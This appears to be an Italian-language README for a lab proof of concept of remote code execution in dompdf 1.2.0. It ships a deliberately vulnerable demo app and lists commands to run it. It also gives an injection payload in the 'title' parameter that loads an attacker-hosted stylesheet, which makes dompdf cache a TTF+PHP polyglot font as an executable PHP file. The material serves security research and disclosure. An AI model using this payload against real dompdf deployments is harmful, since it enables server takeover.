
Exploit RCE per dompdf
Questo repository contiene un'applicazione demo vulnerabile che utilizza dompdf 1.2.0 e un exploit che consente l'esecuzione remota di codice tramite un file poliglotta ttf+php.

Per maggiori dettagli, visita https://positive.security/blog/dompdf-rce
$ cd application
$ php -S localhost:9000
$ cd exploit
$ php -S localhost:9001
http://localhost:9000/index.php?pdf&title=<link rel=stylesheet href='http://localhost:9001/exploit.css'>
phpinfo()http://localhost:9000/dompdf/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php
Nota: Se stai utilizzando domini o porte diversi, modifica exploit/exploit.css di conseguenza e controlla application/dompdf/lib/fonts per il nome completo del file font.